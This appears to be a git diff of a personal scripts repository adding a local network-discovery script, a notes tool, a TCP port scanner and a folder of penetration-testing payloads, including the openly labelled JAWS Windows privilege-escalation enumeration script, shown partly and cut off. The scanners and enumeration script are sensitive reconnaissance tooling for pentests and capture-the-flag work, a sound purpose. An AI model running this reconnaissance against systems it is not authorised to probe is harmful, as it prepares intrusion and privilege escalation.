# Lowercase the joined arguments, then walk the string one character at a
# time with substring expansion (unmapped characters are skipped).
input="$(echo "$*" | tr '[:upper:]' '[:lower:]')"

result=()
for (( idx = 0; idx < ${#input}; idx++ )); do
    ch="${input:idx:1}"
    if [[ -n "${nato_map[$ch]:-}" ]]; then
        result+=("${nato_map[$ch]}")
    elif [[ "$ch" == " " ]]; then
        result+=("/")   # Use / as space separator
    fi
done

# Output with spaces between words
echo "${result[*]}"
|
||||
476
scripts/network-discovery.sh
Executable file
476
scripts/network-discovery.sh
Executable file
|
|
@ -0,0 +1,476 @@
|
|||
#!/usr/bin/env bash
set -euo pipefail

# Script Name: network-discovery.sh
# Description: Discover devices on local network and highlight the newest device
# Version: 1.0.0
# Dependencies: arp-scan (or nmap), gum (optional but recommended)

# === Configuration ===
readonly SCRIPT_DIR="$(cd "$(dirname "${BASH_SOURCE[0]}")" && pwd)"
readonly VERSION="1.0.0"

# Per-run log file; falls back to /dev/null when the path is not writable.
# NOTE: LOGFILE is only made readonly AFTER the fallback assignment — the
# previous `readonly LOGFILE=…; touch … || LOGFILE=/dev/null` aborted under
# `set -e` with "readonly variable" exactly when the fallback was needed.
LOGFILE="${LOGFILE:-/tmp/$(basename "$0" .sh)-$$.log}"
touch "$LOGFILE" 2>/dev/null || LOGFILE="/dev/null"
chmod 644 "$LOGFILE" 2>/dev/null || true
readonly LOGFILE

# Colors for output
readonly RED='\033[0;31m'
readonly GREEN='\033[0;32m'
readonly YELLOW='\033[1;33m'
readonly BLUE='\033[0;34m'
readonly CYAN='\033[0;36m'
readonly MAGENTA='\033[0;35m'
readonly BOLD='\033[1m'
readonly NC='\033[0m'
||||
|
||||
# === Logging Functions ===
# All levels share one formatter; every line is mirrored into $LOGFILE.
_emit_log() {
    local level="$1"
    shift
    echo "[$(date '+%Y-%m-%d %H:%M:%S')] [$level] $*" | tee -a "$LOGFILE"
}

log()       { _emit_log INFO "$@"; }
log_error() { _emit_log ERROR "$@" >&2; }   # diagnostics go to stderr
log_warn()  { _emit_log WARN "$@"; }

# === Cleanup Handler ===
TEMP_FILES=()

cleanup() {
    # Runs on EXIT/INT/TERM: remove registered temp files and, when the
    # script succeeded, the per-run log file as well.
    local status=$?

    local tmp
    for tmp in "${TEMP_FILES[@]}"; do
        [[ -f "$tmp" ]] && rm -f "$tmp"
    done

    if [[ $status -eq 0 ]] && [[ "$LOGFILE" != "/dev/null" ]]; then
        rm -f "$LOGFILE" 2>/dev/null || true
    fi

    exit $status
}

trap cleanup EXIT INT TERM
|
||||
|
||||
# === Dependency Checking ===
HAS_GUM=false
HAS_ARP_SCAN=false
SCAN_METHOD=""

check_dependencies() {
    # Detect the optional UI helper (gum) and choose a scanning backend.
    # Sets HAS_GUM, HAS_ARP_SCAN, SCAN_METHOD; returns 1 if no scanner.

    # gum is optional — also look in the conventional Go install dir.
    # (Removed the hardcoded /home/e/go/bin fallback: this script runs as
    # root, and prepending another user's writable directory to root's
    # PATH is unsafe; $HOME/go/bin already covers the intended machine.)
    if command -v gum &>/dev/null; then
        HAS_GUM=true
    elif [[ -x "$HOME/go/bin/gum" ]]; then
        HAS_GUM=true
        export PATH="$HOME/go/bin:$PATH"
    fi

    # Pick a scanning tool: arp-scan preferred for MAC/vendor detection.
    if command -v arp-scan &>/dev/null; then
        HAS_ARP_SCAN=true
        SCAN_METHOD="arp-scan"
    elif command -v nmap &>/dev/null; then
        SCAN_METHOD="nmap"
        log_warn "Using nmap (arp-scan recommended for better MAC detection)"
    else
        log_error "No network scanning tool found"
        echo "Please install one of:"
        echo "  sudo apt install arp-scan    (recommended)"
        echo "  sudo apt install nmap"
        return 1
    fi

    return 0
}
|
||||
|
||||
# === UI Functions ===
show_header() {
    # Clear the screen and print the banner — gum if available, ANSI boxes
    # otherwise. (NOTE(review): box interior spacing approximated.)
    clear

    if [[ "$HAS_GUM" != "true" ]]; then
        echo -e "${BLUE}╔════════════════════════════════════════════════════╗${NC}"
        echo -e "${BLUE}║${NC}        🔍 ${BOLD}NETWORK DEVICE DISCOVERY${NC}                 ${BLUE}║${NC}"
        echo -e "${BLUE}║${NC}                                                    ${BLUE}║${NC}"
        echo -e "${BLUE}║${NC}  v${VERSION}                                            ${BLUE}║${NC}"
        echo -e "${BLUE}║${NC}  Scanning local network...                         ${BLUE}║${NC}"
        echo -e "${BLUE}╚════════════════════════════════════════════════════╝${NC}"
        echo
        return
    fi

    gum style \
        --border thick \
        --border-foreground 12 \
        --align center \
        --width 60 \
        --margin "1" \
        --padding "1 2" \
        "🔍 NETWORK DEVICE DISCOVERY" \
        "" \
        "v${VERSION}" \
        "Scanning local network..."
    echo
}
|
||||
|
||||
# === Network Functions ===
get_local_network() {
    # Derive the scan target from the default gateway, assuming a /24.
    local gw
    gw=$(ip route | awk '/default/ {print $3; exit}')

    if [[ -z "$gw" ]]; then
        log_error "Could not determine default gateway"
        return 1
    fi

    # Drop the last octet and append .0/24.
    echo "${gw%.*}.0/24"
}
|
||||
|
||||
scan_network_arp_scan() {
    # arp-scan the local segment, teeing the raw output into $2.
    # $1 (network) is accepted for signature parity but unused: arp-scan
    # derives the range from the interface itself.
    local network="$1"
    local output_file="$2"

    if [[ "$HAS_GUM" != "true" ]]; then
        echo -e "${CYAN}⏳ Scanning network with arp-scan...${NC}"
        sudo arp-scan --localnet 2>/dev/null | tee "$output_file"
        return
    fi

    echo -e "${CYAN}🔍 Scanning network with arp-scan...${NC}"
    (
        sudo arp-scan --interface=eth0 --localnet 2>/dev/null || \
        sudo arp-scan --interface=wlan0 --localnet 2>/dev/null || \
        sudo arp-scan --localnet 2>/dev/null
    ) | tee "$output_file" &

    local scan_pid=$!
    # gum spinner runs until the backgrounded scan finishes.
    gum spin --spinner pulse --title "Scanning local network..." -- bash -c "while kill -0 $scan_pid 2>/dev/null; do sleep 0.1; done"
    wait $scan_pid
}

scan_network_nmap() {
    # Ping/ARP sweep of network $1 with nmap, teeing raw output into $2.
    local network="$1"
    local output_file="$2"

    if [[ "$HAS_GUM" != "true" ]]; then
        echo -e "${CYAN}⏳ Scanning network with nmap...${NC}"
        sudo nmap -sn -PR "$network" 2>/dev/null | tee "$output_file"
        return
    fi

    echo -e "${CYAN}🔍 Scanning network with nmap...${NC}"
    (
        sudo nmap -sn -PR "$network" 2>/dev/null
    ) | tee "$output_file" &

    local scan_pid=$!
    gum spin --spinner pulse --title "Scanning local network..." -- bash -c "while kill -0 $scan_pid 2>/dev/null; do sleep 0.1; done"
    wait $scan_pid
}
|
||||
|
||||
parse_arp_scan_results() {
    # Turn raw arp-scan output ("IP  MAC  Vendor Name") into pipe-delimited
    # "ip|mac|vendor" lines in $2. Pipe is used instead of comma so vendor
    # names containing commas survive downstream splitting.
    local raw="$1"
    local parsed="$2"

    grep -E "([0-9]{1,3}\.){3}[0-9]{1,3}" "$raw" \
        | grep -v "^Interface\|^Starting\|^Ending\|packets received" \
        | awk '{
            vend = (NF >= 3) ? $3 : ""
            for (k = 4; k <= NF; k++) vend = vend " " $k
            if (vend == "") vend = "Unknown"
            printf "%s|%s|%s\n", $1, $2, vend
          }' > "$parsed"
}
|
||||
|
||||
parse_nmap_results() {
    # Convert `nmap -sn` output plus the ARP cache into "ip|mac|vendor"
    # lines in $2. Output is PIPE-delimited to match parse_arp_scan_results
    # and every downstream consumer (find_newest_device / display_results
    # split on '|'); the previous comma-separated output broke both.
    local scan_file="$1"
    local results_file="$2"

    log "Checking ARP cache for MAC addresses..."

    # Collect the IPs nmap reported as up.
    local found_ips=()
    local line
    while read -r line; do
        if [[ "$line" =~ "Nmap scan report for" ]]; then
            local ip
            ip=$(echo "$line" | grep -oE '([0-9]{1,3}\.){3}[0-9]{1,3}')
            [[ -n "$ip" ]] && found_ips+=("$ip")
        fi
    done < "$scan_file"

    # Resolve MAC addresses (and a coarse vendor guess) from the ARP cache.
    local ip
    for ip in "${found_ips[@]}"; do
        local arp_line
        arp_line=$(arp -n | grep "^$ip " 2>/dev/null)

        if [[ -n "$arp_line" ]]; then
            # arp -n format: 10.98.0.1  ether  aa:bb:cc:dd:ee:ff  C  eth0
            local mac
            mac=$(echo "$arp_line" | awk '{print $3}')

            # Identify common virtualization OUIs without a vendor database.
            local vendor="Unknown"
            if [[ "$mac" =~ ^([0-9a-fA-F]{2}:){5}[0-9a-fA-F]{2}$ ]]; then
                case "${mac:0:8}" in
                    "00:50:56"|"00:0c:29"|"00:05:69") vendor="VMware" ;;
                    "08:00:27") vendor="VirtualBox" ;;
                    "52:54:00") vendor="QEMU/KVM" ;;
                    *) vendor="Device" ;;
                esac
            fi

            echo "${ip}|${mac}|${vendor}"
        else
            echo "${ip}|Unknown|Unknown"
        fi
    done > "$results_file"
}
|
||||
|
||||
find_newest_device() {
    # Heuristically pick the "newest" device from a pipe-delimited results
    # file: the last scanned entry still present in the ARP cache wins; if
    # none is in the cache, fall back to the last line of the file.
    local scan_results="$1"

    local best_ip="" best_mac="" best_vendor=""
    local entry_ip entry_mac entry_vendor
    while IFS='|' read -r entry_ip entry_mac entry_vendor; do
        [[ -n "$entry_ip" ]] || continue

        if arp -n "$entry_ip" &>/dev/null; then
            best_ip=$entry_ip
            best_mac=$entry_mac
            best_vendor=$entry_vendor
        fi
    done < "$scan_results"

    if [[ -z "$best_ip" ]]; then
        local fallback
        fallback=$(tail -n1 "$scan_results")
        best_ip=$(echo "$fallback" | cut -d'|' -f1)
        best_mac=$(echo "$fallback" | cut -d'|' -f2)
        best_vendor=$(echo "$fallback" | cut -d'|' -f3)
    fi

    echo "${best_ip}|${best_mac}|${best_vendor}"
}
|
||||
|
||||
display_results() {
    # Render the device table (newest device starred), then a summary box.
    # $1 - results file of "ip|mac|vendor" lines
    # $2 - "ip|mac|vendor" string for the newest device
    # (NOTE(review): decorative whitespace inside boxes approximated.)
    local results_file="$1"
    local newest_device="$2"

    local newest_ip newest_mac newest_vendor
    IFS='|' read -r newest_ip newest_mac newest_vendor <<< "$newest_device"

    echo
    if [[ "$HAS_GUM" != "true" ]]; then
        echo -e "${GREEN}╔══════════════════════════════════════════════════╗${NC}"
        echo -e "${GREEN}║${NC}          📊 Discovered Devices                   ${GREEN}║${NC}"
        echo -e "${GREEN}╚══════════════════════════════════════════════════╝${NC}"
        echo
    else
        gum style \
            --border double \
            --border-foreground 10 \
            --padding "1" \
            "📊 Discovered Devices"
        echo
    fi

    # Table header
    printf "${BOLD}%-16s %-20s %-30s${NC}\n" "IP ADDRESS" "MAC ADDRESS" "VENDOR"
    echo "────────────────────────────────────────────────────────────────────"

    local device_count
    device_count=$(wc -l < "$results_file" 2>/dev/null || echo 0)

    # One awk pass does all row formatting (avoids pipe/subshell issues).
    awk -F '|' -v star_ip="$newest_ip" \
        -v MAGENTA="${MAGENTA}" -v CYAN="${CYAN}" -v YELLOW="${YELLOW}" \
        -v GREEN="${GREEN}" -v BOLD="${BOLD}" -v NC="${NC}" \
        '{
            if ($1 == star_ip) {
                # Newest device — highlight it.
                printf "%s%s%-16s%s %s%s%-20s%s %s%-30s%s %s⭐ NEWEST%s\n", \
                    BOLD, MAGENTA, $1, NC, \
                    BOLD, CYAN, $2, NC, \
                    YELLOW, $3, NC, \
                    GREEN, NC
            } else {
                printf "%-16s %-20s %-30s\n", $1, $2, $3
            }
        }' "$results_file"

    echo
    echo -e "${BLUE}━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━${NC}"

    # Summary box
    if [[ "$HAS_GUM" != "true" ]]; then
        echo
        echo -e "${GREEN}✅ Scan Complete!${NC}"
        echo -e "${BOLD}Total devices found:${NC} ${device_count}"
        echo
        echo -e "${BOLD}${MAGENTA}Newest Device:${NC}"
        echo -e "  ${BOLD}IP:${NC}     ${newest_ip}"
        echo -e "  ${BOLD}MAC:${NC}    ${newest_mac}"
        echo -e "  ${BOLD}Vendor:${NC} ${newest_vendor}"
    else
        gum style \
            --border rounded \
            --border-foreground 10 \
            --foreground 10 \
            --padding "1" \
            "✅ Scan Complete!" \
            "" \
            "Total devices found: ${device_count}" \
            "Newest device: ${newest_ip}" \
            "MAC Address: ${newest_mac}" \
            "Vendor: ${newest_vendor}"
    fi

    echo
}
|
||||
|
||||
# === Usage Function ===
usage() {
    # Print help text; the script name is resolved once instead of three
    # separate $(basename "$0") substitutions.
    local self
    self=$(basename "$0")

    cat << EOF
Usage: ${self} [OPTIONS]

Description:
  Scan local network for devices and highlight the newest device

Options:
  -h, --help     Show this help message
  -v, --verbose  Enable verbose output

Examples:
  sudo ${self}
  sudo ${self} --verbose

Requirements:
  - Must run with sudo (for network scanning)
  - arp-scan or nmap installed
  - gum (optional, for enhanced UI)

EOF
}
|
||||
|
||||
# === Main Logic ===
main() {
    # CLI parsing: only -h/--help and -v/--verbose are recognized.
    while [[ $# -gt 0 ]]; do
        case "$1" in
            -h|--help)
                usage
                exit 0
                ;;
            -v|--verbose)
                set -x
                shift
                ;;
            *)
                log_error "Unknown option: $1"
                usage
                exit 1
                ;;
        esac
    done

    # Raw network scanning requires root.
    if [[ $EUID -ne 0 ]]; then
        log_error "This script must be run as root (for network scanning)"
        echo "Please run: sudo $0"
        exit 1
    fi

    check_dependencies || exit 2

    show_header

    # Nudge toward arp-scan when we had to fall back to nmap.
    if [[ "$SCAN_METHOD" == "nmap" ]]; then
        echo -e "${YELLOW}💡 Tip: Install arp-scan for better device detection${NC}"
        echo -e "${YELLOW}   Command: sudo apt install arp-scan${NC}"
        echo
    fi

    log "Detecting local network..."
    local net
    net=$(get_local_network)
    log "Network: $net"
    echo -e "${BLUE}ℹ️  Network: ${BOLD}$net${NC}"
    echo

    local raw_scan parsed
    raw_scan=$(mktemp)
    parsed=$(mktemp)
    # Only raw_scan is registered for trap cleanup — parsed must survive
    # until display_results has consumed it.
    TEMP_FILES+=("$raw_scan")

    log "Scanning network with $SCAN_METHOD"
    case "$SCAN_METHOD" in
        arp-scan)
            scan_network_arp_scan "$net" "$raw_scan"
            parse_arp_scan_results "$raw_scan" "$parsed"
            ;;
        *)
            scan_network_nmap "$net" "$raw_scan"
            parse_nmap_results "$raw_scan" "$parsed"
            ;;
    esac

    if [[ ! -s "$parsed" ]]; then
        log_error "No devices found on network"
        exit 1
    fi

    log "Analyzing results..."
    local newest
    newest=$(find_newest_device "$parsed")

    display_results "$parsed" "$newest"

    # Clean up results file after display
    rm -f "$parsed"

    log "✅ Network discovery complete"
}

# Run main function
main "$@"
|
||||
192
scripts/note
Executable file
192
scripts/note
Executable file
|
|
@ -0,0 +1,192 @@
|
|||
#!/usr/bin/env bash
set -euo pipefail

# Script Name: note
# Description: Quick notes with tags, search, and project awareness
# Usage: note "quick thought"            # Add note
#        note -t security "found XSS"    # Tagged note
#        note -s "search term"           # Search notes
#        note -l                         # List recent notes
#        note -e                         # Edit notes file

VERSION="1.0.0"

# Determine notes location (project-aware): inside a git repo, notes live
# with the project; otherwise a single global file is used.
if git rev-parse --git-dir > /dev/null 2>&1; then
    # In a git repo - use project notes
    NOTES_FILE="$(git rev-parse --show-toplevel)/.notes.md"
else
    # Global notes
    NOTES_FILE="$HOME/notes.md"
fi

# Colors
# RED was missing: the error paths in the argument parser reference
# ${RED}, which aborted with "unbound variable" under `set -u`.
readonly RED='\033[0;31m'
readonly GREEN='\033[0;32m'
readonly YELLOW='\033[1;33m'
readonly BLUE='\033[0;34m'
readonly CYAN='\033[0;36m'
readonly BOLD='\033[1m'
readonly NC='\033[0m'
|
||||
|
||||
show_help() {
    # Print usage, options, examples, and the active notes file location.
    # printf '%b' interprets the embedded \033 escapes just as `echo -e`
    # did. (NOTE(review): column alignment approximated.)
    printf '%b\n' "\033[1mnote\033[0m - Quick Notes Tool v${VERSION}"
    printf '\n'
    printf '%b\n' "\033[1mUSAGE:\033[0m"
    printf '%s\n' "  note <text>              Add a note"
    printf '%s\n' "  note [OPTIONS]"
    printf '\n'
    printf '%b\n' "\033[1mOPTIONS:\033[0m"
    printf '%b\n' "  \033[0;36m-t, --tag\033[0m      Add note with tag"
    printf '%b\n' "  \033[0;36m-s, --search\033[0m   Search notes"
    printf '%b\n' "  \033[0;36m-l, --list\033[0m     List recent notes (last 10)"
    printf '%b\n' "  \033[0;36m-e, --edit\033[0m     Edit notes file"
    printf '%b\n' "  \033[0;36m-p, --path\033[0m     Show notes file path"
    printf '%b\n' "  \033[0;36m-h, --help\033[0m     Show this help message"
    printf '\n'
    printf '%b\n' "\033[1mEXAMPLES:\033[0m"
    printf '%s\n' "  note \"remember to test this\""
    printf '%s\n' "  note -t security \"found XSS in login\""
    printf '%s\n' "  note -t todo \"implement feature X\""
    printf '%s\n' "  note -s \"XSS\""
    printf '%s\n' "  note -l"
    printf '\n'
    printf '%b\n' "\033[1mNOTES LOCATION:\033[0m"
    printf '%s\n' "  Current: ${NOTES_FILE}"
    if git rev-parse --git-dir > /dev/null 2>&1; then
        printf '%b\n' "  ${CYAN}(Project notes - in git repo)${NC}"
    else
        printf '%b\n' "  ${YELLOW}(Global notes)${NC}"
    fi
}
|
||||
|
||||
# Add note
add_note() {
    # Append a timestamped, tagged entry to $NOTES_FILE, creating the file
    # with a "# Notes" header on first use.
    # $1 - note text; $2 - tag (defaults to "general")
    local text="$1"
    local tag="${2:-general}"
    local timestamp   # was an implicit global — now scoped to the function

    if [[ ! -f "$NOTES_FILE" ]]; then
        echo "# Notes" > "$NOTES_FILE"
        echo >> "$NOTES_FILE"
    fi

    # Entry format: ## YYYY-MM-DD HH:MM - [TAG]
    timestamp=$(date '+%Y-%m-%d %H:%M')
    {
        echo "## $timestamp - [$tag]"
        echo
        echo "$text"
        echo
    } >> "$NOTES_FILE"

    echo -e "${GREEN}✓${NC} Note added to: ${NOTES_FILE}"
    echo -e "${CYAN}Tag:${NC} $tag"
}
|
||||
|
||||
# Search notes
search_notes() {
    # Case-insensitive search of $NOTES_FILE with 2 lines of context.
    # $1 - search query
    local query="$1"

    if [[ ! -f "$NOTES_FILE" ]]; then
        echo -e "${YELLOW}No notes file found${NC}" >&2
        exit 1
    fi

    echo -e "${BOLD}${CYAN}Search results for: ${query}${NC}"
    echo

    # Both branches of the old "if bat exists" check ran this identical
    # command, so the dead conditional has been removed.
    grep -i --color=always "$query" "$NOTES_FILE" -B 2 -A 2 || echo "No matches found"
}
|
||||
|
||||
# List recent notes
list_recent() {
    # Print the LAST 10 note sections (entries start with "## ").
    if [[ ! -f "$NOTES_FILE" ]]; then
        echo -e "${YELLOW}No notes file found${NC}" >&2
        exit 1
    fi

    echo -e "${BOLD}${CYAN}Recent Notes (last 10):${NC}"
    echo

    # Collect each "## " section into an array, then emit only the final
    # 10. (The previous awk printed the FIRST sections of the file, which
    # contradicted the "last 10" label since notes are appended in
    # chronological order.)
    awk '
        /^## / { n++ }
        n > 0  { sec[n] = sec[n] $0 "\n" }
        END {
            first = (n > 10) ? n - 9 : 1
            for (i = first; i <= n; i++) printf "%s", sec[i]
        }
    ' "$NOTES_FILE"
}
|
||||
|
||||
# Edit notes
edit_notes() {
    # Seed the notes file with a header before opening it in $EDITOR.
    if [[ ! -f "$NOTES_FILE" ]]; then
        printf '# Notes\n\n' > "$NOTES_FILE"
    fi

    # Deliberately unquoted so a multi-word EDITOR (e.g. "code -w") works.
    ${EDITOR:-vim} "$NOTES_FILE"
}
|
||||
|
||||
# Show path
show_path() {
    # Print the active notes file location (project or global).
    printf '%s\n' "$NOTES_FILE"
}
|
||||
|
||||
# Parse arguments
if [[ $# -eq 0 ]]; then
    show_help
    exit 0
fi

case "$1" in
    -h|--help)
        show_help
        ;;
    -t|--tag)
        if [[ $# -lt 3 ]]; then
            # ${RED:-}: RED is not declared by this script's color block,
            # so a bare ${RED} aborts here under `set -u` instead of
            # printing the usage error.
            echo -e "${RED:-}Error:${NC} Tag and note text required" >&2
            echo "Usage: note -t <tag> <text>" >&2
            exit 1
        fi
        tag="$2"
        shift 2
        text="$*"
        add_note "$text" "$tag"
        ;;
    -s|--search)
        if [[ $# -lt 2 ]]; then
            echo -e "${RED:-}Error:${NC} Search query required" >&2
            exit 1
        fi
        shift
        search_notes "$*"
        ;;
    -l|--list)
        list_recent
        ;;
    -e|--edit)
        edit_notes
        ;;
    -p|--path)
        show_path
        ;;
    *)
        # Default: treat all arguments as note text with the "general" tag.
        add_note "$*"
        ;;
esac
|
||||
109
scripts/old-port-scanner.py
Executable file
109
scripts/old-port-scanner.py
Executable file
|
|
@ -0,0 +1,109 @@
|
|||
#!/usr/bin/python3

# Information Security
# Certification Project #3

import socket
import re

import common_ports  # course helper: dict of well-known port -> service

# Module-level socket retained for backward compatibility with earlier
# revisions of get_open_ports().
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)

# Manual test fixtures (kept commented out):
# target = "www.freecodecamp.org"
# target = socket.gethostbyname("www.freecodecamp.org")
# target = "hi"
# port_range = [75, 85]
# get_open_ports(target, port_range)
|
||||
|
||||
def get_open_ports(target, port_range, verbose=None):
    """Scan `target` for open TCP ports in the inclusive range `port_range`.

    Args:
        target: hostname or dotted-quad IPv4 address.
        port_range: two-element sequence [first_port, last_port], inclusive.
        verbose: when truthy, print a PORT/SERVICE table of the results.

    Returns:
        A list of open port numbers, or an error string when the target
        cannot be resolved ("Error: Invalid IP address" for numeric-looking
        targets, "Error: Invalid hostname" otherwise).
    """
    # Resolve the target; classify the failure by its shape so the error
    # message matches what the caller supplied. (The old bare `except`
    # printed the error and exit()'d the whole interpreter.)
    try:
        ip_addr = socket.gethostbyname(target)
    except socket.gaierror:
        if re.search('^[0-9]+', target):
            return 'Error: Invalid IP address'
        return 'Error: Invalid hostname'

    first, last = port_range[0], port_range[1]

    open_ports = []
    for port in range(first, last + 1):
        # A fresh socket per probe: a socket cannot be reused after a
        # failed connect. The old code shared one module-level socket,
        # built the port list with a buggy nested for/while (duplicated
        # scans), and called open_ports.append[port] — a TypeError on the
        # first open port found.
        with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as probe:
            probe.settimeout(2)
            if probe.connect_ex((ip_addr, port)) == 0:
                open_ports.append(port)

    # Summary output
    print(f'\n* Scanning Target: {target} ({ip_addr}) *')
    print('- Scanning ports:', first, 'to', last)

    if verbose:
        # Map each open port to its well-known service name; .get() avoids
        # a KeyError for ports absent from the course's service table.
        services = common_ports.ports_and_services
        print(f'\nOpen ports for {target} ({ip_addr})')
        print('PORT     SERVICE')
        for port in open_ports:
            print(str(port) + '     ' + str(services.get(port, 'unknown')))
    else:
        print('Open Ports:', open_ports)

    return open_ports
||||
1352
scripts/payloads/LinEnum.sh
Normal file
1352
scripts/payloads/LinEnum.sh
Normal file
File diff suppressed because it is too large
Load diff
20914
scripts/payloads/PowerView.ps1
Normal file
20914
scripts/payloads/PowerView.ps1
Normal file
File diff suppressed because it is too large
Load diff
280
scripts/payloads/jaws-enum.ps1
Normal file
280
scripts/payloads/jaws-enum.ps1
Normal file
|
|
@ -0,0 +1,280 @@
|
|||
<#
|
||||
.SYNOPSIS
|
||||
Windows enumeration script
|
||||
.DESCRIPTION
|
||||
This script is designed to be used in a penetration test or CTF
|
||||
enviroment. It will enumerate useful information from the host
|
||||
for privilege escalation.
|
||||
.EXAMPLE
|
||||
PS > .\jaws-enum.ps1
|
||||
will write results out to screen.
|
||||
.EXAMPLE
|
||||
PS > .\jaws-enum.ps1 -OutputFileName Jaws-Enum.txt
|
||||
Writes out results to Jaws-Enum.txt in current directory.
|
||||
.LINK
|
||||
https://github.com/411Hall/JAWS
|
||||
#>
|
||||
Param(
|
||||
[String]$OutputFilename = ""
|
||||
)
|
||||
|
||||
function JAWS-ENUM {
|
||||
write-output "`nRunning J.A.W.S. Enumeration"
|
||||
$output = ""
|
||||
$output = $output + "############################################################`r`n"
|
||||
$output = $output + "## J.A.W.S. (Just Another Windows Enum Script) ##`r`n"
|
||||
$output = $output + "## ##`r`n"
|
||||
$output = $output + "## https://github.com/411Hall/JAWS ##`r`n"
|
||||
$output = $output + "## ##`r`n"
|
||||
$output = $output + "############################################################`r`n"
|
||||
$output = $output + "`r`n"
|
||||
$win_version = (Get-WmiObject -class Win32_OperatingSystem)
|
||||
$output = $output + "Windows Version: " + (($win_version.caption -join $win_version.version) + "`r`n")
|
||||
$output = $output + "Architecture: " + (($env:processor_architecture) + "`r`n")
|
||||
$output = $output + "Hostname: " + (($env:ComputerName) + "`r`n")
|
||||
$output = $output + "Current User: " + (($env:username) + "`r`n")
|
||||
$output = $output + "Current Time\Date: " + (get-date)
|
||||
$output = $output + "`r`n"
|
||||
$output = $output + "`r`n"
|
||||
write-output " - Gathering User Information"
|
||||
$output = $output + "-----------------------------------------------------------`r`n"
|
||||
$output = $output + " Users`r`n"
|
||||
$output = $output + "-----------------------------------------------------------`r`n"
|
||||
$adsi = [ADSI]"WinNT://$env:COMPUTERNAME"
|
||||
$adsi.Children | where {$_.SchemaClassName -eq 'user'} | Foreach-Object {
|
||||
$groups = $_.Groups() | Foreach-Object {$_.GetType().InvokeMember("Name", 'GetProperty', $null, $_, $null)}
|
||||
$output = $output + "----------`r`n"
|
||||
$output = $output + "Username: " + $_.Name + "`r`n"
|
||||
$output = $output + "Groups: " + $groups + "`r`n"
|
||||
}
|
||||
$output = $output + "`r`n"
|
||||
$output = $output + "-----------------------------------------------------------`r`n"
|
||||
$output = $output + " Network Information`r`n"
|
||||
$output = $output + "-----------------------------------------------------------`r`n"
|
||||
$output = $output + (ipconfig | out-string)
|
||||
$output = $output + "`r`n"
|
||||
$output = $output + "-----------------------------------------------------------`r`n"
|
||||
$output = $output + " Arp`r`n"
|
||||
$output = $output + "-----------------------------------------------------------`r`n"
|
||||
$output = $output + (arp -a | out-string)
|
||||
$output = $output + "`r`n"
|
||||
$output = $output + "`r`n"
|
||||
$output = $output + "-----------------------------------------------------------`r`n"
|
||||
$output = $output + " NetStat`r`n"
|
||||
$output = $output + "-----------------------------------------------------------`r`n"
|
||||
$output = $output + (netstat -ano | out-string)
|
||||
$output = $output + "`r`n"
|
||||
$output = $output + "`r`n"
|
||||
$output = $output + "-----------------------------------------------------------`r`n"
|
||||
$output = $output + " Firewall Status`r`n"
|
||||
$output = $output + "-----------------------------------------------------------`r`n"
|
||||
$output = $output + "`r`n"
|
||||
$Firewall = New-Object -com HNetCfg.FwMgr
|
||||
$FireProfile = $Firewall.LocalPolicy.CurrentProfile
|
||||
if ($FireProfile.FirewallEnabled -eq $False) {
|
||||
$output = $output + ("Firewall is Disabled" + "`r`n")
|
||||
} else {
|
||||
$output = $output + ("Firwall is Enabled" + "`r`n")
|
||||
}
|
||||
$output = $output + "`r`n"
|
||||
$output = $output + "-----------------------------------------------------------`r`n"
|
||||
$output = $output + " FireWall Rules`r`n"
|
||||
$output = $output + "-----------------------------------------------------------`r`n"
|
||||
Function Get-FireWallRule
|
||||
{Param ($Name, $Direction, $Enabled, $Protocol, $profile, $action, $grouping)
|
||||
$Rules=(New-object -comObject HNetCfg.FwPolicy2).rules
|
||||
If ($name) {$rules= $rules | where-object {$_.name -like $name}}
|
||||
If ($direction) {$rules= $rules | where-object {$_.direction -eq $direction}}
|
||||
If ($Enabled) {$rules= $rules | where-object {$_.Enabled -eq $Enabled}}
|
||||
If ($protocol) {$rules= $rules | where-object {$_.protocol -eq $protocol}}
|
||||
If ($profile) {$rules= $rules | where-object {$_.Profiles -bAND $profile}}
|
||||
If ($Action) {$rules= $rules | where-object {$_.Action -eq $Action}}
|
||||
If ($Grouping) {$rules= $rules | where-object {$_.Grouping -like $Grouping}}
|
||||
$rules}
|
||||
$output = $output + (Get-firewallRule -enabled $true | sort direction,applicationName,name | format-table -property Name , localPorts,applicationname | out-string)
|
||||
$output = $output + "-----------------------------------------------------------`r`n"
|
||||
$output = $output + " Hosts File Content`r`n"
|
||||
$output = $output + "-----------------------------------------------------------`r`n"
|
||||
$output = $output + "`r`n"
|
||||
$output = $output + ((get-content $env:windir\System32\drivers\etc\hosts | out-string) + "`r`n")
|
||||
$output = $output + "`r`n"
|
||||
write-output " - Gathering Processes, Services and Scheduled Tasks"
|
||||
$output = $output + "-----------------------------------------------------------`r`n"
|
||||
$output = $output + " Processes`r`n"
|
||||
$output = $output + "-----------------------------------------------------------`r`n"
|
||||
$output = $output + ((Get-WmiObject win32_process | Select-Object Name,ProcessID,@{n='Owner';e={$_.GetOwner().User}},CommandLine | sort name | format-table -wrap -autosize | out-string) + "`r`n")
|
||||
$output = $output + "-----------------------------------------------------------`r`n"
|
||||
$output = $output + " Scheduled Tasks`r`n"
|
||||
$output = $output + "-----------------------------------------------------------`r`n"
|
||||
$output = $output + "Current System Time: " + (get-date)
|
||||
$output = $output + (schtasks /query /FO CSV /v | convertfrom-csv | where { $_.TaskName -ne "TaskName" } | select "TaskName","Run As User", "Task to Run" | fl | out-string)
|
||||
$output = $output + "`r`n"
|
||||
$output = $output + "-----------------------------------------------------------`r`n"
|
||||
$output = $output + " Services`r`n"
|
||||
$output = $output + "-----------------------------------------------------------`r`n"
|
||||
$output = $output + (get-service | Select Name,DisplayName,Status | sort status | Format-Table -Property * -AutoSize | Out-String -Width 4096)
|
||||
$output = $output + "`r`n"
|
||||
write-output " - Gathering Installed Software"
|
||||
$output = $output + "`r`n"
|
||||
$output = $output + "-----------------------------------------------------------`r`n"
|
||||
$output = $output + " Installed Programs`r`n"
|
||||
$output = $output + "-----------------------------------------------------------`r`n"
|
||||
$output = $output + (get-wmiobject -Class win32_product | select Name, Version, Caption | ft -hidetableheaders -autosize| out-string -Width 4096)
|
||||
$output = $output + "`r`n"
|
||||
$output = $output + "-----------------------------------------------------------`r`n"
|
||||
$output = $output + " Installed Patches`r`n"
|
||||
$output = $output + "-----------------------------------------------------------`r`n"
|
||||
